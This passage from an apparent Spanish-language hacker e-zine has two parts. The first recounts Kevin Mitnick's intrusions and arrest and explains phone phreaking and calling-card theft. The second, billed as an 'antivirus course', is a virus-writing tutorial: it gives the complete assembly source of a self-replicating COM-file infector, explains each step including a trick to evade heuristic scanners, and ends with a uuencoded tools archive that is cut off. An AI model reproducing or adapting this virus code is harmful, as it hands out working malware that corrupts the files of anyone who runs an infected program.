MCI Communications y Digital Equipment Corporation para conocer como estaban protegidos las computadoras y el sistema telefonico de ambas compa±ias. Luego de recoger suficiente informacion se apodero de 16 codigos de seguridad de MCI y junto a un amigo, Lenny DiCicco, entraron a la red del laboratorio de investigaciones de Digital Corporation, conocida como Easynet. Ambos Hackers querian obtener una copia del prototipo del nuevo sistema operativo de seguridad de Digital llamado VMS. El personal de seguridad de Digital se dio cuenta inmediatamente del ataque y dieron aviso al FBI, y comenzaron a rastrear a los hackers. Mitnick fue un mal complice y, a pesar de que habian trabajado juntos, trato de echarle toda la culpa a DiCicco haciendo llamadas anonimas al jefe de este que trabajaba en una compa±ia de software como tecnico de soporte. Lleno de rabia y frustracion DiCicco le confeso todo a su jefe que los denuncio a Digital y al FBI. Mitnick fue arrestado en 1988 por invadir el sistema de Digital Equipment. La empresa acuso a Mitnick y a DiCicco ante un juez federal de causarles da±os por 4 millones de dolares en el robo de su sistema operativo. Fue declarado culpable de un cargo de fraude en computadoras y de uno por posesion ilegal de codigos de acceso de larga distancia. Adicional a la sentencia el fiscal obtuvo una orden de la corte que prohibia a Mitnick el uso del telefono en la prision alegando que el prisionero podria obtener acceso a las computadoras a traves de cualquier telefono. A peticion de Mitnick el juez lo autorizo a llamar unicamente a su abogado, a su esposa, a su madre y a su abuela y solo bajo supervision de un oficial de la prision. Este caso produjo revuelo en los Estados Unidos, no solo por el hecho delictivo sino por la tactica que utilizo la defensa. Su abogado convencio al juez que Mitnick sufria de una adiccion por las computadoras equivalente a la de un drogadicto, un alcoholico o un apostador. Gracias a esta maniobra de la defensa Mitnick fue sentenciado a solo un a±o de prision y al salir de alli debia seguir un programa de seis meses para tratar su "adiccion a las computadoras". Durante su tratamiento le fue prohibido tocar una computadora o un modem y llego a perder mas de 45 kilos. Para 1991 ya era el Hacker que habia ocupado la primera plana del New York Times y uno de sus reporteros, John Markoff, decidio escribir un libro de estilo Cyberpunk narrando las aventuras de Mitnick. Al parecer a Mitnick no le gusto el libro ya que luego de salir a la venta, la cuenta en Internet de Markoff fue invadida, cambiando su nivel de acceso, de manera de que cualquier persona en el mundo conectada a Internet podia ver su correo electronico. En 1992, y luego de concluir su programa, Mitnick comenzo a trabajar en una agencia de detectives. Pronto se descubrio un manejo ilegal en el uso de la base de datos y fue objeto de una investigacion por parte del FBI quien determino que habia violado los terminos de su libertad condicional. Allanaron su casa pero habia desaparecido sin dejar rastro alguno. Ahora Mitnick se habia convertido en un Hacker profugo. El fiscal no estaba tan equivocado cuando pidio la restriccion del uso del telefono. Tambien en 1992, el Departamento de Vehiculos de California ofrecio una recompensa de 1 millon de dolares a quien arrestara a Mitnick por haber tratado de obtener una licencia de conducir de manera fraudulenta, utilizando un codigo de acceso y enviando sus datos via fax. El Fin Luego de convertirse en profugo de la justicia cambio de tactica y concluyo que la mejor manera de no ser rastreado era utilizando telefonos celulares. De esta manera podria cometer sus fechorias y no estar atado a ningun lugar fijo. Para ello necesitaba obtener programas que le permitieran moverse con la misma facilidad con que lo hacia en la red telefonica. Luego de varios intentos infructuosos, en cuanto a calidad de informacion, se encontro con la computadora de Tsutomu Shimomura la cual invadio en la Navidad de 1994. Shimomura, fisico computista y experto en sistemas de seguridad del San Diego Supercomputer Center, era ademas un muy buen Hacker, pero era de los "chicos buenos", ya que cuando hallaba una falla de seguridad en algun sistema lo reportaba a las autoridades, no a otros Hackers. Shimomura noto que alguien habia invadido su computadora en su ausencia, utilizando un metodo de intrusion muy sofisticado y que el nunca antes habia visto. El intruso le habia robado su correo electronico, software para el control de telefonos celulares y varias herramientas de seguridad en Internet. Alli comenzo la cuenta regresiva para Mitnick. Shimomura se propuso como orgullo personal atrapar al Hacker que habia invadido su privacidad. Hacia finales de enero de 1995, el software de Shimomura fue hallado en una cuenta en The Well, un proveedor de Internet en California. Mitnick habia creado una cuenta fantasma en ese proveedor y desde alli utilizaba las herramientas de Shimomura para lanzar ataques hacia una docena de corporaciones de computadoras, entre ellas Motorola, Apple y Qualcomm. Shimomura se reunio con el gerente de The Well y con un tecnico de Sprint (proveedor de servicios telefonicos celulares) y descubrieron que Mitnick habia creado un numero celular fantasma para accesar el sistema. Luego de dos semanas de rastreos determinaron que las llamadas provenian de Raleigh, California. Al llegar Shimomura a Raleigh recibio una llamada del experto en seguridad de InterNex, otro proveedor de Internet en California. Mitnick habia invadido otra vez el sistema de InterNex, habia creado una cuenta de nombre Nancy, borrado una con el nombre Bob y habia cambiado varias claves de seguridad incluyendo la del experto y la del gerente del sistema que posee los privilegios mas altos. De igual manera Shimomura tenia informacion sobre la invasion de Mitcnick a Netcom, una red de base de datos de noticias. Shimomura se comunico con el FBI y estos enviaron a un grupo de rastreo por radio. El equipo de rastreo poseia un simulador de celda, un equipo normalmente utilizado para probar telefonos celulares pero modificado para rastrear el telefono de Mitnick mientras este esta encendido y aunque no este en uso. Con este aparato el celular se convertiria en un transmisor sin que el usuario lo supiera. A medianoche terminaron de colocar los equipos en una Van y comenzo la busqueda de la se±al, porque eso era lo que querian localizar; no buscaban a un hombre porque todas las fotos que tenian eran viejas y no estaban seguros de su aspecto actual, el objetivo de esa noche era determinar el lugar de procedencia de la se±al. Ya para la madrugada localizaron la se±al en un grupo de apartamentos pero no pudieron determinar en cual debido a interferencias en la se±al. Mientras esto ocurria la gente de InterNex, The Well y Netcom estaban preocupados por los movimientos que casi simultaneamente Mitnick hacia en cada uno de estos sistemas. Cambiaba claves de acceso que el mismo habia creado y que tenian menos de 12 horas de creadas, utilizando codigos extra±os e ironicos como no,panix, fukhood y fuckjkt. Estaba creando nuevas cuentas con mayores niveles de seguridad como si sospechara que lo estaban vigilando. El FBI, Shimomura y el equipo de Sprint se habian reunido para planificar la captura. Shimomura envio un mensaje codificado al buscapersonas del encargado en Netcom para advertirle que el arresto se iba a realizar al dia siguiente, 16 de Febrero. Shimomura envio el mensaje varias veces por equivocacion y el encargado interpreto que Mitnick ya habia sido arrestado adelantandose a realizar una copia de respaldo de todo el material que Mitnick habia almacenado en Netcom como evidencia y borrando las versiones almacenadas por Mitnick. Habia que realizar el arresto de inmediato, antes de que Mitnick se diera cuenta de que su informacion habia sido borrada. Cuando faltaban minutos para dar la orden el simulador de celdas detecto una nueva se±al de transmision de datos via celular y simultanea a la de Mitnick, muy cerca de esa zona. Algo extra±o estaba haciendo Mitnick con las lineas celulares, Shimomura trato de advertirle al agente del FBI pero ya todo estaba en manos de ellos, Shimomura de ahora en adelante no era mas que un espectador privilegiado. El FBI no pensaban hacer una entrada violenta porque no creian que Mitnick estuviera armado, pero tenian que actuar muy rapido porque sabian el da±o que este hombre podia causar en un solo minuto con una computadora. Se acercaron lentamente hasta la entrada del apartamento de Mitnick y anunciaron su presencia, si no les abrian la puerta en cinco segundos la echarian abajo. Mitnick abrio la puerta con toda calma y el FBI procedio a arrestarlo y a decomisar todo el material pertinente discos, computador, telefonos celulares, manuales, etc. De regreso a su hotel Shimomura decide chequear la contestadora telefonica de su residencia en San Diego. Se quedo en una pieza cuando escucho la voz de Mitnick quien le habia dejado varios mensajes con acento oriental en tono de burla. El ultimo de estos mensajes lo habia recibido ocho horas despues de que Mitnick habia sido arrestado y antes de que la prensa se hubiera enterado de todo el asunto. Como se realizo esa llamada aun es un misterio al igual que el origen y objetivo de la segunda se±al de Mitnick. Este persistente hacker actualmente esta siendo juzgado y enfrenta dos cargos federales, uso ilegal de equipos de acceso telefonico y fraude por computadoras. Puede ser condenado por hasta 35 a±os y a pagar una multa de hasta medio millon de dolares. Mitnick tambien es sospechoso de robar el software que las compa±ias telefonicas piensan usar para todo tipo de procesos, desde la facturacion hasta el seguimiento del origen de una llamada pasando por la decodificacion de las se±ales de los telefonos celulares para preservar su privacidad. El vuelo final Todos los cargos bajo los cuales ha sido acusado Kevin Mitnick podrian suponerle mas de doscientos a±os de prision si es declarado culpable "No culpable" alcanzo a declararse Kevin Mitnick ante el Gran Jurado de California, que el pasado 30 de septiembre lo acuso de 25 cargos por los cuales podria ser condenado a mas de doscientos a±os de presidio. "Esta acusacion revela el amplio da±o que Mitnick causo mientras era un fugitivo de la justicia. Los delitos por computadora permiten a sofisticados criminales causar estragos alrededor del mundo usando solo una computadora y un modem como sus armas. Queremos con esta acusacion dar un paso adelante en los esfuerzos federales por perseguir y capturar a los hackers" dijo la fiscal encargada del caso, Nora Manella. Los cargos por los que fue acusado Mitnick y su ayudante Lewis Depayne, de 36 a±os, incluyen el robo de software, fraude electronico, da±o a las computadoras de la Universidad del Sur de California, robo de archivos electronicos e intercepcion de mensajes de correo electronico. Entre las compa±ias afectadas por las actividades del llamado "Condor" se cuentan Motorola, Nokia, Fujitsu y Nec. Se supone que los da±os causados por Mitnick en los dos a±os y medio durante los cuales fue un fugitivo suman millones de dolares, especialmente por el software robado y las inversiones que debieron realizar las empresas para proteger sus sistemas. El asistente del fiscal David Schindler dijo que Mitnick -quien actualmente tiene 33 a±os- seria probablemente sentenciado a "muchos a±os" si es encontrado culpable, negandose, sin embargo, a ser mas especifico, bajo el argumento de que se trata de un area legal muy nueva. Todos los cargos bajo los cuales ha sido acusado Mitnick podrian suponerle mas de doscientos a±os de prision si es declarado culpable de todos ellos. Ya en abril de este a±o el famoso hacker habia sido declarado culpable por un jurado de Carolina del Norte por el uso del quince numeros de telefonos celulares robados para llamar a bases de datos electronicas. Igualmente se le condeno por haber violado el regimen de libertad condicional al que estaba sometido luego de ser encontrado culpable de penetrar ilegalmente en sistemas de informacion de corporaciones de informatica. Mitnick: hacker, cracker y phone phreaker La definicion de un cracker es alguien que trata de violar el acceso a un sistema adquiriendo passwords. La mayoria de los crackers son adolescentes nada bondadosos y que buscan dar sus golpes destruyendo o alterando la data de un sistema. Tienden a unirse en grupos muy peque±os, secretos y cerrados al contrario de los inmensos, abierto y policulturales hackers. Se espera que un verdadero hacker haga algo de crackin jugueton y conozca muchas de las tecnicas basicas, pero cualquiera que pase de la etapa de larva puede caer en la tentacion y, debido a su creciente deseo de realizar algo por razones inmediatas, benignas y practicas, no vea nada de malo en invadir cierta seguridad y privacidad para poder lograr una meta. Para el cracker el invadir un sistema no requiere de misteriosos estados de iluminacion mental, pero si mucha persistencia y la testaruda repeticion de trucos bien conocidos en los puntos debiles de un sistema, tratan de descubrir informacion clasificada hurgando al azar y con ciega persistencia. Suele decirse que los crackers son solo hackers mediocres y que su nivel de educacion e inteligencia sobre un sistema es menor. Los phone phreaker son los mas famosos en los medios de comunicacion por los desastres que han hecho a traves de los a±os. En los a±os 60 ya existian los Phone Phreaks y la gran victima era AT&T. Uno de los mas famosos Phone Phreaks de esa epoca era John Draper, alias Captain Crunch (http://www.fc.net/phrack.html). El descubrio que modificando una caja de cereal podia producir el silbido que simulaba un tono de 2600 Hz para desbloquear el acceso a una troncal y poder hacer llamadas internacionales gratis. Hace algun tiempo el hacer phreaking fue una actividad semi-respetable dentro de la comunidad hacker; habia un acuerdo de caballeros donde el hacer phreaking era bien visto como juego intelectual y como una forma de exploracion, pero el robo de servicios era tabu. La modernizacion de las redes hizo necesario que los phreakers utilizaran tecnicas menos eticas, como robar numeros de calling cards: los obtenian colocandose cerca de algun telefono publico y memorizando el numero de tarjeta que marcaba un usuario descuidado, una vez obtenido el numero y la clave la informacion era esparcida de tal manera que en un caso se llegaron a realizar 600 llamadas internacionales en dos minutos antes de que los operadores de seguridad del sistema la cancelaran. RareGaZz@Bigfoot.com [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] µµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµµ µ segunda parte del curso de antivirus µ ╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞ Segundo capítulo: INFECCION APPENDING DE COMS. VIRUS NO RESIDENTE ****************************************************************************** Disposición Legal: > Yo, el autor, declino toda responsabilidad civil y/o legal que discurra > de la utilización fraudulenta de esta información. El responsable único > y último ser el lector si decide usarla para dichos fines. El autor: Manuel Llorens. ****************************************************************************** Bueno, pues aquí tenéis el infector de COMs: === ASM Begin 'v020.asm'=== ; El presente listado es un virus de 225 bytes. Es capaz de infectar ; COMs que se encuentren en el directorio en el que se ejecuta. Buscar ; hasta encontrar un COM apropiado. No reinfecta. La marca de infección ; es 0fe0h en el último word. No infectar los archivos protegidos ; contra escritura. Preserva la fecha y la hora del archivo original. ; Para ensamblar: TASM virus, TLINK /t virus ; Patuel ;** Longitud del virus ** virLENGTH equ offset virEND-offset virBEGIN ;** Típica plantilla de COM ** C_SEG segment 'CODE' org 100h assume cs:C_SEG,ds:C_SEG,es:C_SEG ;** Aquí comienza el host, el falso host es NOP, NOP, NOP, INT 20h ** host: jmp far ptr entry ; Saltamos al código vírico ;** Aquí vendr el resto del programa host ** int 20h ;** Aquí comienza el virus en sí ** virBEGIN label byte ;** Calculamos el δ-offset entry: int 68h call near ptr start start: pop bp ; BP = offset de start sub bp,offset start ; La primera vez obtenemos BP = 0 ;** Restauramos los 3 primeros bytes del host ** mov di,100h ; Principio del host push di ; Dejamos 100h en la pila lea si,buffer+bp movsw ; Ahorramos bytes al no cargar CX movsb ;** Ahora creamos un nuevo DTA al final del virus ** mov ah,1ah ; Establecer DTA en DS:DX lea dx,virEND+bp int 21h ;** Buscamos un archivo para infectar ** mov ah,4eh ; Buscar primer archivo que coincida lea dx,path+bp ; con la cadena en DS:DX xor cx,cx ; Sólo archivos normales busqueda: int 21h ; (no infectar los write protected) jc salir ; salir si hubo error ;** Abrimos el archivo que haya encontrado ** mov ax,3d02h ; Abrir fichero en DS:DX el lec/esc ; En el offset 1eh de la DTA est ; el nombre del archivo lea dx,virEND+bp+1eh int 21h jc salir ; salir si hubo error xchg bx,ax ; metemos en BX el handle ;** Guardamos los 3 primeros bytes del host ** mov ah,3fh ; Leer CX bytes desde BX hasta DS:DX mov cx,3 lea dx,buffer+bp ; Los metemos en el buffer int 21h ;** Movemos el puntero al final del fichero ** sigue: mov ax,4202h ; Mover el puntero la cantidad CX:DX mov cx,0ffffh ; desde el final del archivo mov dx,-2 int 21h ;** Leemos el último word del fichero ** mov ah,3fh ; Leer desde BX hasta DS:DX mov cx,2 ; Leemos 2 bytes lea dx,buffer2+bp ; Los metemos en el buffer int 21h ;** Miramos si el archivo ya estaba infectado ** cmp word ptr buffer2+bp,0e00fh je otro ;** Averiguamos la longitud del archivo ** mov ax,4201h ; Mover el puntero la cantidad CX:DX xor cx,cx ; desde la posición actual xor dx,dx int 21h ; Nos devuelve en DX:AX la longitud ;** Comprobamos si el COM tiene un tamaño 'erróneo' ** or dx,dx ; El COM es demasiado grande jne otro cmp ax,0ffffh-VirLENGTH jnb otro cmp ax,10h ; El COM es demasiado pequeño jb otro ;** Guardamos la longitud del host ** sub ax,3 ; Longitud menos salto inicial mov word ptr long+bp,ax ;** Añadimos el virus al final del archivo ** mov ah,40h ; Escribir CX bytes desde DS:DX a BX mov cx,VirLENGTH lea dx,VirBEGIN+bp ; Desde el comienzo del virus int 21h ;** Movemos el puntero al principio del archivo ** mov ax,4200h ; Mover el puntero la cantidad CX:DX xor cx,cx ; desde el comienzo del archivo xor dx,dx int 21h ;** Escribimos el salto ** mov ah,40h ; Escribir CX bytes desde DS:DX a BX mov cx,3 lea dx,salto+bp ; Reconstrucción del salto int 21h ;** Restauramos la fecha y la hora originales ** call fecha ;** Cerramos el archivo ** mov ah,3eh ; Cerrar el handle en BX int 21h ;** Restauramos los registros de segmento ** salir: mov ax,cs mov ds,ax mov es,ax ;** Volvemos a poner el DTA original ** mov ah,1ah ; Establecer DTA en DS:DX mov dx,80h int 21h ;** Saltamos a 100h ** ret ;** Cerramos el archivo ** otro: mov ah,3eh ; Cerrar el handle en BX int 21h ;** Como el arhivo ya estaba infectado buscamos el siguiente ** mov ah,4fh ; Buscar siguiente archivo jmp busqueda ;** Restauramos la fecha y la hora que est n aún en el DTA ** fecha: mov ax,5701h ; Establecer fecha y hora de BX mov cx,word ptr [virEND+bp+16h] mov dx,word ptr [virEND+bp+18h] int 21h ret ;** Archivos a buscar en forma de ASCIIZ ** path db '*.COM',0 ;** Reconstrucción del salto que ir al comienzo del archivo ** salto db 0e9h long dw ? ;** Aquí guardamos los 3 primeros bytes del host ** buffer db 3 dup(90h) ;** Aquí guardamos los 2 últimos bytes del host ** buffer2 db 2 dup(?) ;** Marca de archivo infectado ** marca db 0fh,0e0h ;** Aquí termina el virus ** virEND label byte C_SEG ends end host === ASM end 'v020.asm'=== Para todos aquellos para los que este sea el primer contacto con el listado de un virus, la compresión de este ASM ser fundamental. Por ello es muy importante que preguntéis todo lo que no entend is del mismo. Voy a intentar explicarlo lo mejor posible, pero es un poco liosillo, así que probad por vuestra cuenta y preguntad ;) Lo primero que debo aclarar es que el listado de arriba no es el listado de un virus sino el listado de un programa infectado por el virus. Esto siempre se hace así cuando se comienza a escribir un virus. Se crea un archivo host (anfitrión) para el virus lo m s sencillo posible. En este caso el listado ensamblador del host es: 90h nop ; No hacer nada 90h nop ; No hacer nada 90h nop ; No hacer nada cd20h int 20h ; Salir Supongamos entonces que teníamos este archivo y que lo hemos infectado a mano. La infección se produce del siguiente modo: Sustituimos los 3 primeros bytes del archivo host por un salto al final del mismo. Añadimos el código vírico al final del archivo. El código vírico restaura los 3 primeros bytes del host en momoria, ejecuta su código y devuelve el control al host. De este modo el host no se entera de que est infectado, dado que se ejecuta sin 'molestia'. La única excepción a esta regla supone que el COM se abra a sí mismo como archivo para leer datos y que lo haga leyendo desde una posición relativa al final del fichero, eso o que el COM se autochequee. Esto lo podemos evitar mediante un virus stealth, pero eso lo dejamos para el final del capítulo ;) Vamos paso por paso a ver qué es lo que hace el virus. Lo primero que tenemos en el listado es el salto al código vírico. Estamos viendo el listado de un programa infectado, así que los tres bytes que pertenecían al host est n guardados en 'buffer' (90,90,90h) con el fin de poder restaurarlos m s adelante. El 'jmp' salta hasta el código vírico, que comienza en 'entry'. Todo lo que queda entre ambas direcciones es parte del host y no lo tocamos para nada. Como se puede comprender r pidamente, la dirección de 'entry' cambiar según lo grande que sea el host. Así que lo siguiente que hacemos es averiguar cual es esa dirección. Esto es necesario dado que los offsets de las variables que usa el virus ('buffer' por ejemplo) los ha calculado el ensamblador respecto al host de 5 bytes, pero cuando el host sea mayor las variables tendr n offsets mayores, tanto mayores cuanto mayor sea el host. Para eso hacemos el call que comienza en entry (olvidaros del int 68h de momento). tenemos esto: entry: call near ptr start start: pop bp sub bp,offset start Como todos sabéis el call salta a start dejando en la pila la dirección (sólo el offset por ser un salto near) de la instrucción siguiente al call, que en este caso es el propio start. De ese modo cuando hacemos el pop obtenemos en bp el offset real de start y dejamos la pila 'limpia' A continuación le restamos el offset de start en el momento de la compilación. De ese modo si estamos ejecutando este listado ambos offsets ser n iguales y bp ser 0. Este valor de bp es lo que se conoce como δ-offset. Cuando el host sea mayor el valor obtenido mediante el pop ser mayor, pero lo que le restamos sigue siendo un valor fijo. Como es un proceso algo complicadillo vamos a verlo m s en detalle: 0105 e80000 call 0108 (deja 0108 en la pila) 0108 5d pop bp (bp=0108) 0109 81ed0301 sub bp,108 (bp=0) En un host diferente: 0205 e80000 call 0208 (deja 0208 en la pila) 0208 5d pop bp (bp=0208) 0209 81ed0301 sub bp,108 (bp=0100) Es decir, 100h es la diferencia de bytes entre ambos hosts, y es lo que ha aumentado el offset de las variables internas del virus ;) A partir de ese punto todas las variables del virus las deberemos usar de la forma variable+bp. Resumiendo, hasta aquí tenemos lo siguiente: ┌─ salto ┌─> inicio del host A) │ resto del host B) │ resto del host └─> código vírico └─ Código vírico Vamos a continuar con el código del virus. Como al final del código vírico tendremos que saltar a la dirección 100h (comienzo del código ejecutable). Para ello dejamos 100h en la pila y al final de virus hacemos un simple ret. Es una forma de despistar a algunos antivirus heurísticos, de modo que no crean que el virus devuelve el control al host. Esto lo hacemos mediante: mov di,100h push di Ahora restauramos los 3 primeros bytes del host (en memoria). Para ello como DS y ES ya los tenemos cargados y di es justo 100h porque lo acabamos de cargar sólo tenemos que cargar SI con el offset de buffer: lea si,buffer+sp y restauramos los tres bytes con movsw word ptr DS:SI -> word ptr ES:DI SI=SI+2, DI=DI+2 movsb byte ptr DS:SI -> byte ptr ES:DI SI=SI+1, DI=DI+1 Si ahora pusiésemos un ret el virus no haría nada, pero funcionaría perfectamente. Así que ahora pasamos al código realmente reproductivo. Lo que viene a continuación involucra al DTA, así que vamos a ver el DTA en detalle. El DTA es una estructura que por defecto se sitúa a partir del offset 80h del segmento del PSP. Es decir si el COM comienza en 100h pues est en los 20h bytes anteriores. Esta localización presenta un problemas y es que es la misma que utiliza el DOS para pasar al COM los par metros que se hayan especificado desde la línea de comandos. Esto es un problema pues si usamos la DTA por defecto nos estaremos cargando los par metros y si el host los necesita no los encontrar ... para ello necesitamos crear otro DTA en una localización distinta. En este caso lo situaremos al final del virus. Para ello tenemos una función del DOS: mov ah,1ag lea dx,virEND+bp int 21h Esto hace que el nuevo DTA sea el indicado por DS:DX. DX lo cargamos con el final del virus y DS ya est cargado (lo hace el DOS al pasar el control al host y nosotros no lo hemos tocado). Ahora que tenemos una DTA segura veamos su estructura: === TXT begin 'DTA' === HelpPC 2.10 Quick Reference Utility Copyright 1991 David Jurgens DTA - Disk Transfer Area (partially undocumented) DTA contains data, of which the first 21 bytes (00-15h) are known as being "reserved for DOS use on subsequent find next calls" Offset Size Description 00 byte attribute of search (undocumented) 01 byte drive used in search (undocumented) 02 11bytes search name used (undocumented) 0D word directory entry number (0 based, DOS 3.x+, undoc.) 0F word starting cluster number of current directory zero for root directory (DOS 3.x+, undocumented) 11 word reserved (undocumented) 13 word starting cluster number of current directory zero for root directory (DOS 2.x+, undocumented) 15 byte attribute of matching file 16 word file time (see FILE ATTRIBUTES) 18 word file date (see FILE ATTRIBUTES) 1A word file size 1E 13bytes ASCIIZ filename and extension in the form NAME.EXT with blanks stripped - fields of DTA change dependent upon function call in progress - the DTA cannot span a 64K segment boundary - for compatibility with CP/M the default DTA is at offset 80h in the PSP; this area is also used for the command tail. To avoid collision, set another DTA (INT 21,1A) or preserve the command tail before using FCB function calls === TXT end 'DTA' === A nostros sólo nos va a interesar los offsets 16, 18 y 1e que son la hora, la fecha y el nombre del fichero respectivamente. Vamos a seguir con el virus que m s adelante vermos cómo usar estos offsets. (El offset 15 que contiene los atributos también es interesante si queremos preservarlos, pero como este virus no los cambia no ser necesario). Ahora le decimos al DOS que nos busque el primer '*.COM' que encuentre en el directorio actual. Para ello llamamos a la función del DOS que cumple ese cometido: mov ah,4ah lea dx,path+bp xor cx,cx busqueda: int 21h jc salir Esta función nos devolver el carry a uno si no encuentra ningún fichero que coincida con la descripción. Si lo encuentre devolver su nombre en el offset 1eh del DTA (junto con el resto de los datos en los respectivos campos). M s adelante si este archivo no nos satisface (porque ya esté infectado por ejemplo) le pediremos al DOS que nos busque el siguiente archivo que coincida con la descripción. En este caso la función a llamar es la 4fh y el proceso es similar, salvo que no tenemos que decirle el '*.COM' porque el DOS ya lo sabe de antes, de hecho lo ha guardado en el DTA (offset 02h). Esa es la explicación del precedimiento 'otro': otro: 'Cerramos el fichero' mov ah,4fh jmp busqueda Pero antes de decirle que busque otro debemos ver si el archivo que nos ha pasado el DOS nos satisface. Para ello vemos antes de nada si ya estaba infectado. Lo cierto es que el virus (por el modo en que est construido) seguiría funcionando perfectamente aunque un archivo se infectase numerosas veces, pero con cada infección su ejecución sería m s y m s lenta, y el archivo m s y m s grande, de ahí que lo mejor sea evitar múltiples infecciones. Para saber si un archivo est infectado acabamos el código vírico en la palabra '0fe0h' (es un virus con complejos ;) Si el archivo que estamos intentando infectar ya acaba de ese modo no lo infectamos y llamamos a otro, en caso contrario seguimos. Antes de eso tenemos que abrir el archivo en lectura/escritura, guardar los 3 primeros bytes del archivo a infectar, mover el puntero al final del archivo y leemos finalmente esos dos últimos bytes. Como esta parte es muy f cil no la detallo, si tenéis dudas preguntadlo. Pero la verdad es que con conocer bien la descripción de cada servicio del DOS del que hace uso el virus es muy f cil seguirle la pista. Los que quer is tener una buena descripción os recomiendo las Ralph Brown o el HelpPC ;) Es MUY importante copiar los 3 primeros bytes del host antes de la infección ya que el virus que va a reproducirse es el que est en memoria y si no lo copiamos antes el virus que se copiar tendr los tres primeros bytes del host actual, no del host que estamos infectando... :)) Comparamos pues los dos últimos bytes: cmp word ptr buffer2+bp,0e00fh je otro Si el virus no estaba infectado averiguamos su tamaño. Podemos leerlo del DTA o pedirle al DOS que nos lo diga, pero ya que tenemos el archivo abierto y el puntero al final del archivo (lo teniamos al final -2, pero al leer esos dos bytes se ha quedado al final) tenemos el tamaño del virus en DX:AX (el servicio del DOS que mueve el puntero trabaja de ese modo). Si DX no es 0 entonces el COM ocupa m s de un segmento y no lo infectamos, si el tamaño del host m s el del virus es mayor de un segmento tampoco lo infectamos y finalmente si el virus es demasiado pequeño tampoco (así adem s evitamos infectar archivos trampa). En caso de que el archivo cumpla con todos los requisitos pasamos a la infección propiamente dicha. Para ello ya que estamos al final del archivo a infectar lo que hacemos es añadir primero el virus. Antes guardamos el tamaño del virus -3 ya que es esta la cantidad que tendr que saltar el salto que luego pondremos al principio del nuevo host. Como hemos marcado bien desde el comienzo el principio, el final y el tamaño del virus, el proceso es muy sencillo: mov ah,40h mov cx,VirLENGTH lea dx,VirBEGIN int 21h Ahora movemos el puntero de nuevo al comienzo del virus y escribimos el salto. Para ello hemos preparado ya una copia exacta del salto en las variables de final del código vírico: salto db 0e9h opcode de salto near (no relativo) long dw ? Una vez que hemos copiado el salto (siguiendo idéntico procedimiento al usado para añadir al final el virus) ponemos la fecha que estaba antes usando un servicio del DOS y tomando los datos del DTA. Cerramos el archivo y reponemos los registros DS y ES. Esto no sería necesario dado que este virus no cambia en ningún momento esos datos, pero es muy probable que si modific is el virus incluy is servicios del DOS que sí los modifiquen (por ejemplo instalar un gestor de la int 24h para que el virus no de error al intentar escribir en un disco protegido contra escritura), y para que no se os olvide lo he puesto. Finalmente restauramos el DTA antiguo (no hemos guardado su dirección anterior, pero sabemos que por defecto est situado en 80h): mov ah,1ah mov dx,80h int 21h y finalizamos con el ret (queda 100h en la pila) ;) Bueno, pues eso es todo lo que hace el virus. Como podréis comprobar se reproduce correctamente y los archivos infectados siguen ejecut ndose perfectamente. Para que pod is practicar os adjunto un host de prueba y un programilla para ver los cambios que el virus hace en dicho archivo. === UUENCODE begin 'utils.zip' === begin 644 utils.zip M4$L#!!0``@`(``^&X2#U.L>=*@```*4%```(````0T%:02Y#3TWMS#$-`$`( M1;&=!`\G"0N0G`$29.()$W]\2\?N,[?H^94J^?CX^/A4WP%02P,$%``"``@` MP`%7'@4O]#0B(```B2$```D```!&24Q%0RY#3TU5>7E8$U?;_IDUD\G"!,*. M$,)B"`01%)7-L(5%B@%9W:WBOC4D8/LJ!*-(,JAHL6IM^P85J]1:5%2T?2L" M@MK:BKO:5ZW4.G&LX@8(,?/1?K\_OM_YXWZ>,]=9KCGSS'G.N>_6NL0S%_QB M.TN7T)VJ%*0NJ(^C!T_O!74_5D#VUXWT[:/H-;;V#G)G6M2]:3^)(>V4K(R\ M5%GRJM6Z<-G829,B9=HIA8FYJ;*,E?/#98G+E\MRERQ:K"^5Y9:4ENC*2A9D MK]++2E:N,BQ:+%M1LF*5[N/`5L`_,P^Z[']95O>>'IPZ]<<V&'E%7^JQO6ZT M;QK0:,X"Z-L=9RC`1M9]N^,8Q<;^@W'_8.(_./\?7/`/EOR#"_]&';&_YZ], M_9O2P:B+4??^=L_V7/O;_-AS;>,]O?O?[NF>:\9A7"<8\0WHWYUZKH5;MOI` MQG>D/B;JGND=K`_^N]U.G=_?YK/_'6#'_YKZOSO#I;[AEK-AT&'+[0)Z(/3U MZ_VSV9K#\`7C#1#'&7Y@H_[/T,9A0G?U_ZN[Z]K_3[VJ]P&H?L"V1+7AWP-H M&GV;OD!?H1FZCQ[\"0$PB6+@GX+S"#X$`X"@&`[^7QEY1`J$HCH`:B^%F]U$ M2$O$97\Z?*25D?8-`UON[DM3UN*I2K-O(@S0\%E*Q@WJ3)BLI+L!H&^?YBKM MKX[TSDL.GH@9^M60\;)QX(Y9['T:`M=ZK5)3!V'J'1R?''\7:$.?T@F?JZHX M`)?RS@8#S"SJ?AZN4R`)VU4@72<?"9`7:;$O=)XFS[P&H.?QW(!!+`5*RK6< M1[]G$=LL2&&F'R!WL_,W%2L;8.F6T-M;VEHR"P_.`=IK3X:V7*6?#$>UA6_! MM>"'LY^'GYX1^JO]=5,+R(0N>_TZ)4K\@3+J+]#X8W/(V?80Y@(8[6O,&QW> MA9^%=?@1;>X3+CI>B<:BDZ#E]X60EDG%?FQ7C:[?H^+<9&&H?`&"!H9)F'Q` M/]."EBR+!JXZ+09GWH?8K)GG@&\K&.]D#0$GQX0J6U&1*N^D:(P($XT=L5$B M7#0^#X@FB$!0[:4M=\]D[!V7Z=>1''3>[=C^1*$`%:BFQ0@PP=A&O@`7C!=T MM'`CZWJ+OA_[0"\U3N;TY,1%D!248Q:,OF;JP%DF]I;ZG%Y&W_7EX:-`%X_# MM:?TO&!N#NS'GL_-X17R?DQ6?[_Q$9?5<=JW4Z!$9?>><JT(T#)N''`%4/X3 MTS.J8/%<)?/8JN6GI)@JT%2GQ77.4O$M\5*(\49YBP'X5DG/QKERF+F*FSI1 MLV;U-(>@S>#CTNVCB/37+FX>>X#O8YL8:4-`),I8WS^.M$>Z[#!,B=1'GHH$ MVB[-.\#\1=5H!KLU?8W&G=@KC"MS,)^X*C?Z3!X2V)E5J%1`]RWE,2\@OBU7 